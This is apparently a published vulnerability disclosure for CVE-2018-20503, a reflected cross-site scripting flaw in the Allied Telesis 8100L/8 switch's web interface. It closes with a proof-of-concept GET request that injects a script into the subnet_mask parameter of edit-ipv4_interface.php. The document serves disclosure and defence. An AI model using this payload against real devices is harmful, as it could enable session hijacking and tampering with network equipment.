# Allied Telesis 8100L/8 - Cross-Site Scripting
# Date: 2018-12-26
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.alliedtelesis.com
# Device Guide: https://www.alliedtelesis.com/products/switches/8100l8
# Model Version: 8100L/8
# CVE: CVE-2018-20503
# Category: Webapps
# Tested on: Windows Server 2012 R2
# Software Description : The Allied Telesis 8100L/8 features 8 x 10/100TX ports and 2 x Gigabit combo 
# (10/100/1000T-100/1000 SFP) uplink ports. With its compact footprint, the 8100L/8 is ideal for wiring-constrained 
# and smaller environments such as micro branch offices, classrooms, cafes, and smaller retail stores.
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, 
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
# Vulnerabilities have been discovered during penetration testing. 
# ==================================================================

# PoC: 
# 'vlanid' and 'subnet_mask' parameters running on "edit-ipv4_interface.php" contain XSS vulnerability.

# GET Request : /edit-ipv4_interface.php?subnet_mask=255.255.0.0tmrsj%22%3e%3cscript%3ealert(1)%3c%2fscript%3et2nfm&ip_address=169.254.1.1&vlanid=1&pgnm=edit